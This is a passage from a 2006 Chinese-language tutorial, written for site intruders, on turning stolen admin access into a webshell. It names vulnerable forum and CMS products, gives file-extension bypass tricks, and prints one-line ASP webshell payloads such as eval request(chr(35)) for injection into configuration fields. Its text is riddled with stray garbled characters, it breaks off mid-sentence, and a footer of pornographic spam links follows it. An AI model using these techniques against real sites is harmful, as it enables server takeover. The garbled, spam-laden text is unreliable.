從后臺得到webshell十大技巧大匯總
2006/5/17 15:52:00
前 言
動網(wǎng)上傳漏洞,相信大家拿下不少肉雞吧??梢哉f是動網(wǎng)讓upfile.asp上傳文件過濾不嚴的漏洞昭然天下����,現(xiàn)在這種漏洞已經(jīng)基本比較難見到了,不排除一些小網(wǎng)站仍然存在此漏洞�。在拿站過程中���,我們經(jīng)常費了九牛兩虎之力拿到管理員帳號和密碼�����,并順利進入了后臺,雖然此時與拿到網(wǎng)站webshell還有一步之遙�,但還是有許多新手因想不出合適的方法而被拒之門外�。因此��,我們把常用的從后臺得到webshell的方法進行了總結和歸納���,大體情況有以下十大方面。
注意:如何進入后臺����,不是本文討論范圍���,其具體方法就不說了�,靠大家去自己發(fā)揮�����。此文參考了前人的多方面的資料和信息��,在此一并表示感謝。
一���、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例���,直接在心情圖標管理上傳.php類型,雖然沒有提示��,其實已經(jīng)成功了�,上傳的文件url應該是http://forums/images/smiles/下,前一陣子的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件�����。文件名是原來的文件名��,bo-blog后臺可以可以直接上傳.php文件����,上傳的文件路徑有提示�。以及一年前十分流行的upfile.asp漏洞(動網(wǎng)5.0和6.0、早期的許多整站系統(tǒng))���,因過濾上傳文件不嚴���,導致用戶可以直接上傳webshell到網(wǎng)站任意可寫目錄中,從而拿到網(wǎng)站的管理員控制權限��。
二��、添加修改上傳類型
現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類型�����,而大多數(shù)的系統(tǒng)是允許添加上傳類型,bbsxp后臺可以添加asa asP類型��,ewebeditor的后臺也可添加asa類型,通過修改后我們可以直接上傳asa后綴的webshell了,還有一種情況是過濾了.asp����,可以添加.aspasp的文件類型來上傳獲得webshell。php系統(tǒng)的后臺���,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最后的哪個只要不是已知的文件類型即可��,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell�����。LeadBbs3.14后臺獲得webshell方法是:在上傳類型中增加asp ���,注意����,asp后面是有個空格的���,然后在前臺上傳ASP馬��,當然也要在后面加個空格!
三、利用后臺管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入后臺后還可以通過修改相關文件來寫入webshell�����。比較的典型的有dvbbs6.0�,還有l(wèi)eadbbs2.88等,直接在后臺修改配置文件,寫入后綴是asp的文件�。而LeadBbs3.14后臺獲得webshell另一方法是:添加一個新的友情鏈接��,在網(wǎng)站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字符,http:\\網(wǎng)站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用后臺管理向配置文件寫webshell
利用"""":""http://"等符號構造最小馬寫入程序的配置文件�,joekoe論壇�,某某同學錄��,沸騰展望新聞系統(tǒng)�����,COCOON Counter統(tǒng)計程序等等,還有很多php程序都可以�����,COCOON Counter統(tǒng)計程序舉例�,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%><%eval request(chr(35))%><%'����,這樣就會形成前后對應����,最小馬也就運行了�����。<%eval request(chr(35))%>可以用lake2的eval發(fā)送端以及最新的2006 客戶端來連,需要說明的是數(shù)據(jù)庫插馬時候要選前者�����。再如動易2005��,到文章中心管理-頂部菜單設置-菜單其它特效��,插入一句話馬"%><%execute request("l")%><%'�����,保 存頂部欄目菜單參數(shù)設置成功后,我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp�����。
五�����、利用后臺數(shù)據(jù)庫備份及恢復獲得webshell
主要是利用后臺對access數(shù)據(jù)庫的“備份數(shù)據(jù)庫”或“恢復數(shù)據(jù)庫”功能���,“備份的數(shù)據(jù)庫路徑”等變量沒有過
下一頁
返回列表
返回首頁
主站蜘蛛池模板:
国产成人精品无码片区在线观看|
性色av一区二区三区|
亚洲精品**中文毛片|
精品国内自产拍在线视频|
国产又色又爽又刺激视频
|
日本三级免费看|
亚洲av无码久久寂寞少妇|
污视频免费网站|
免费看日b视频|
美女被羞羞吸乳动漫视频|
国产伦精品一区二区三区免费下载|
884hutv四虎永久7777|
国产黄视频网站|
h肉3d动漫在线观看网站|
成人欧美一区二区三区的电影|
久久人人爽人人爽人人片dvd|
果冻传媒和91制片厂|
亚洲国产美女精品久久久久|
深爱婷婷激情网|
免费人成激情视频在线观看冫|
羞耻暴露办公室调教play视频|
国产午夜福利片|
国产三级a三级三级野外|
国产精品亚洲精品日韩已方|
91欧美精品综合在线观看|
大学生一级毛片高清版|
videsgratis欧美另类|
性初第一次电影在线观看|
丰满多毛的大隂户毛茸茸|
日本欧美大码aⅴ在线播放|
乱人伦一区二区三区|
欧美成人免费一级人片|
亚洲激情中文字幕|
激情五月激情综合|
催眠美丽人妇系列|
秦先生第15部大战宝在线观看|
又黄又爽又猛大片录像|
美女视频黄.免费网址|
国产一区二区三区在线观看免费|
青草久久精品亚洲综合专区|
日本亚洲高清乱码中文在线观看|